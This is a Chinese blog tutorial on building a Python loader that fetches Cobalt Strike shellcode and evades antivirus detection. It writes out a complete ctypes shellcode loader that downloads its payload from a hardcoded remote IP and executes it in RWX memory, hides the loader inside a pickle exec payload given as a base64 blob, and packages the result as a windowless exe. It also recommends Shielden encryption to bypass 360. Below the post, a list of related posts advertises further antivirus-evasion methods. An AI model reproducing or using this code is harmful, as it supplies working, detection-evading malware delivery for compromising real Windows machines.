(记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)

已于 2022-05-26 16:57:18 修改
阅读量1.8k 收藏 5
点赞数
分类专栏: 免杀 文章标签: python 安全 web安全
于 2021-01-31 11:58:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40989258/article/details/113460218
版权
本文详细介绍了如何利用Python进行payload生成、base64编码、VPS部署、反序列化执行以及打包成exe的过程。通过HTTP请求获取shellcode并在Windows环境下执行,绕过部分安全软件检测。最后提到了可能的免杀方法和相关参考资源。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、首先cs生成一个64位的Python Payload

2、截取其中的Payload,并进行base64编码。

3、把这一串子base64放到VPS上。并开启web服务。

 python3 -m http.server 7777

4、使用以下脚本。将Python Payload进行反序列化。

import pickle

import base64

shellcode = """
import ctypes,urllib.request,codecs,base64

shellcode = urllib.request.urlopen('http://47.101.72.112:7777/py.txt').read()
shellcode = base64.b64decode(shellcode)
shellcode =codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))

# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr), 
    buf, 
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode防止位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.c_uint64(ptr), 
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))"""


class A(object):
    def __reduce__(self):
        return (exec, (shellcode,))


ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
print(ret_base64)
#ret_decode = base64.b64decode(ret_base64)

5、把输出的字节流放到shellcode里,运行执行shellcode,上线。

import base64,pickle,ctypes,urllib.request
shellcode =b'gANjYnVpbHRpbnMKZXhlYwpxAFg1BAAACmltcG9ydCBjdHlwZXMsdXJsbGliLnJlcXVlc3QsY29kZWNzLGJhc2U2NAoKc2hlbGxjb2RlID0gdXJsbGliLnJlcXVlc3QudXJsb3BlbignaHR0cDovLzE3Mi4yMC4xMC4yOjgwODAvMTExMS50eHQnKS5yZWFkKCkKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShzaGVsbGNvZGUpCnNoZWxsY29kZSA9Y29kZWNzLmVzY2FwZV9kZWNvZGUoc2hlbGxjb2RlKVswXQpzaGVsbGNvZGUgPSBieXRlYXJyYXkoc2hlbGxjb2RlKQojIOiuvue9rlZpcnR1YWxBbGxvY+i/lOWbnuexu+Wei+S4umN0eXBlcy5jX3VpbnQ2NApjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0CiMg55Sz6K+35YaF5a2YCnB0ciA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSwgY3R5cGVzLmNfaW50KDB4MzAwMCksIGN0eXBlcy5jX2ludCgweDQwKSkKCiMg5pS+5YWlc2hlbGxjb2RlCmJ1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KAogICAgY3R5cGVzLmNfdWludDY0KHB0ciksIAogICAgYnVmLCAKICAgIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSkKKQojIOWIm+W7uuS4gOS4que6v+eoi+S7jnNoZWxsY29kZemYsuatouS9jee9rummluWcsOWdgOW8gOWni+aJp+ihjApoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZCgKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMuY19pbnQoMCksIAogICAgY3R5cGVzLmNfdWludDY0KHB0ciksIAogICAgY3R5cGVzLmNfaW50KDApLCAKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpCikKIyDnrYnlvoXkuIrpnaLliJvlu7rnmoTnur/nqIvov5DooYzlrowKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLGN0eXBlcy5jX2ludCgtMSkpcQGFcQJScQMu'
pickle.loads(base64.b64decode(shellcode))

6、打包成exe。

pyinstaller -F exp.py --noconsole 

在当前目录下的dist目录下生成好exe。双击上线。

7、实际用了一下发现Defender和火绒没问题,360过不去。

可以使用shielden加密代码进行绕过。

Image

Referer:

https://www.sec-in.cn/article/733

浅谈CS免杀和使用

可执行jar包使用exe4j改为exe执行文件使用shielden加密
sdzhangshulong的博客
04-28 867
生成带授权的可执行文件操作步骤 一.将jar包打成可执行文件 1.下载exe4j且安装 2.打包步骤(注意先关闭毒软件) 最后会在之前选择的位置生成对应的exe可执行文件 二.软件授权 1.下载 shielden软件 2.加密授权 先选择要加密授权的程序 添加要授权的选项 设置...
基于python的简单
2301_76232299的博客
11-21 2032
本次文章只用于技术讨论,学习,切勿用于非法用途。
Python反序列化上线CS
qq_57686163的博客
08-20 981
简单上线cs
Shielden——永久费的软件加密方案
08-20
Shielden——永久费的软件加密方案
内网渗透-CS与应用开发
最新发布
zj2084的博客
03-27 839
再做上面那一步的操作之前,我们先将这段加载器代码放到我们的csshellenc.py里面,将csshellenc.py里面的加密代码先给注释了,看看可不可以上线,也就是看看加载器代码有没有区别。然后在Kali启动我们的客户端,打开cobaltstrike的界面,建立与我们的公网服务器的来连接,端口是50050,用户名随便输,密码是我们刚刚启动teamserver的密码。代码我们已经搞定了,我们该如何去包装一下这个木马,把这个木马包装到正儿八经的应用程序当中去,然后再去做分发。
cs-使用python进行
m0_53087192的博客
02-08 1990
环境 使用python版本为python3.6 32位版本,64位版本测试会报错。 安装pyinstaller,pywin32 pip3 install pyinstaller pip3 install pywin32 生成shellcode 使用cobalsstrike生成c语言shellcode。 使用shellcode loader加载shellcode #!/usr/bin/python3 import ctypes #shellcode 放这个位置 c = b"\xfc\xe8\x89\x
python自启动 绕过360_记录一次绕过软的过程
weixin_35671171的博客
12-27 1400
一、背景在做红队渗透时,经常会遇到目标机安装了各种毒软件,诸如360、腾讯管家之类的。导致生成的payload总是无法利用且被软强制删除的事情时常发生。这个东西真的很烦人,烦死了!只能停下来去研究一下软的原理以及如何绕过。在此记录下来做个备忘录。二、需要用到的工具cobalt strike:这个是在做红队渗透时用到的一款软件,具有团队协作和生成payload的工具。主要有两个部分组成,一个是...
python转exe怎么不会被毒软件_使用Python Shells绕过毒软件
weixin_33045057的博客
02-04 2495
一、绕过毒软件Why?1、使用绕过反病毒软件的方式要比禁用毒软件更加安全;2、展示客户端的反病毒软件是多么脆弱的非常有趣。How?如果你使用二进制,而这个二进制文件被You can bypass AV修改导致它的签名被移除了,然后加密、打包,修改源代码或者重新编辑源代码使用我个人最喜欢的自定义程序。When?只要shell写入磁盘,你就可以开始进行啦!二、为什么选择Python?Python...
关于如何使用shellter以及shielden对于正常软件的双重加壳,过火绒和360
07-16
7. **Shielden二次加壳**:Shielden是另一个加壳工具,用于进一步加密已加壳的木马,增强效果。通过Shielden的操作,可以生成一个新的加壳文件,这个文件在经过火绒等毒软件检测时,能够更好地避被检测出来...
易语言一键过,过360. (加壳)
10-21
在本场景中,"一键过"指的是通过某种自动化过程,使程序能够在安全软件(如360安全卫士)的扫描下不被识别为恶意软件,从而绕过其查机制。 加壳技术通常涉及到程序的二进制代码包装,即将原始可执行文件的...
SE一键加壳三十秒秒过360.zip
09-20
SE一键加壳三十秒秒过360 快速(bypass)360 3步快速加壳 (短期内应该有效) 作者自己在虚拟机测试时msf的木马能过360
SE一键加壳三十秒秒过360
01-03
Shielden有2种工作模式: 完整模式提供完整的Safengine产品体验(如反调试、授权功能等)。 虚拟机模式则以体积和速度优先,提供代码虚拟化等关键保护功能。 您可以运行Shielden.exe启动完整模式,或运行Shielden_Slim.cmd启动虚拟机模式。
Shielden试用次数、天数破解专用工具
02-14
Shielden试用次数、天数破解专用工具
插件分享 | 简单绕过和利用上线的 GoCS
m0_46699477的博客
08-17 565
插件分享 | 简单绕过和利用上线的 GoCS 原创 hututuZh GobySec 昨天 收录于话题 #插件 4个 图片 图片 Goby社区第17 篇插件分享文章 全文共:6214 字 预计阅读时间:16 分钟 前言:Goby 可以快速准确的扫描资产,直观呈现出来。同时经过上次 EXP 计划过后,PoC&EXP 也增加了许多。在实战化漏洞扫描后,对于高危漏洞的利用,不仅仅只在 whoami 上,而是要进入后渗透阶段,那么对于 Windows 机器而言,上线 CS 是必不可少的操作,会
Cobalt_Strike(CS)渗透工具安装使用上线
qq_47289634的博客
06-02 1073
接着写一段C代码,对加密后的shellcode进行解密执行,注意后缀是.c,不是.cpp它们是不一样的。把生成的exe文件放到虚拟机执行之后一样上线,这样要注意把加密后的shellcode也要放入虚拟机。上面代码运行之后会在当前文件夹下生成一个bin文件,记住这个文件的位置,这里我把它放到了E盘下面。记得关闭软,不然会被删,把生成的exe文件放到目标主机双击,即可上线cs。vt过60,一大半了,对于刚接触的我来说,已经不错了。这里代码有很多是我方便调试写的,可以去掉那些打印的。
简单绕过和利用上线的 GoCS
HBohan的博客
08-23 867
前言: Goby 可以快速准确的扫描资产,直观呈现出来。同时经过上次 EXP 计划过后,PoC&EXP 也增加了许多。在实战化漏洞扫描后,对于高危漏洞的利用,不仅仅只在 whoami 上,而是要进入后渗透阶段,那么对于 Windows 机器而言,上线 CS 是必不可少的操作,会让后渗透如鱼得水。此插件只运用了简单的利用方式上线 CS,希望师傅们能够提供想法和建议把它更为完善,源码中有详细的注释,可供师傅们快速理解。 0×01 插件使用 1.1 插件效果 1.2 使用方法 1.在工具栏导入 CS
网络安全进阶篇之(十四章-8)使用掩日配合CS360
划水的小白白
05-30 1118
文章目录一、 概念1.1 360 安全卫士和 360 毒二、前期准备2.1 下载地址三、具体过程3.1 使用CS生成payload3.2 3603.3 火绒 一、 概念 1.1 360 安全卫士和 360 360 毒是 360 安全中心出品的一款费的云安全毒软件。 它创新性地整合了五大领先查引擎,包括国际知名的 BitDefender 病毒查引擎、 Avira(小红伞)病毒查引擎、360 云查引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能引擎。 二
python打包的exe如何_CS强化_python
weixin_39947314的博客
11-26 772
CS作为主流红队工具,其在后渗透中的地位自不用说,功能强大,但如何让它活下去就成了个人发挥的内容,今天我们以python payload为例展开。payload生成通过cs自动生成我们python payload:值得一提的是360、电脑管家等均为对该payload报毒,倒是Windows Defender觉得事情没那么简单,显然不装毒软件的PC是最难搞的23333,因为它会默认开启Window...
使用Shellter与Shielden双重加壳技术绕过安全软件检测
该资源是一份关于如何使用Shellter和Shielden进行双重加壳,以绕过火绒和360毒软件检测的PPT教程,特别针对Windows系统的加壳入侵。作者在学习MSF(Metasploit Framework)过程中,结合永恒之蓝漏洞,探讨如何在...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值